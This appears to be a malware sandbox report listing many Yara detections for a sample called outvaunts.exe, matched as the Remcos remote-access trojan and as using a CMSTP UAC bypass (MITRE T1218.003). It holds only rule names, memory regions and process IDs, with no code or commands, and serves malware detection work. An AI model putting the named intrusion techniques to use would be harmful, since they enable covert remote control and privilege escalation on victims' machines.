              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
